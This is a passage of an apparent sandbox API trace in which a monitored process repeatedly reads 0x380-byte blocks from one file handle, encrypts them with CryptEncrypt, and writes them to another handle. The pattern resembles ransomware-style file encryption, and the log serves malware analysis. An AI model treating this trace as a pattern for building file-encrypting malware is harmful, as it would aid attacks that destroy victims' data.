pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.777] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.777] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.777] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.777] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.777] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.777] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.777] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.777] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.777] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.777] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.778] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.778] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.778] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.778] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.778] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.778] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.778] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.779] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.779] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.779] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.779] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.779] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.779] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.779] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.779] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.779] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.779] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.780] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.780] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.780] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.780] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.780] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.780] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.780] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.780] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.780] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.780] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.781] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.782] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.782] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.782] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.782] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.782] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.782] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.783] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.783] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.783] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.783] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.784] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.784] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.784] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.784] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.784] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.784] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.784] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.784] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.784] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.785] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.785] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.785] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.785] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.785] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.785] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.785] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.785] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.786] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.786] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.786] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.786] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 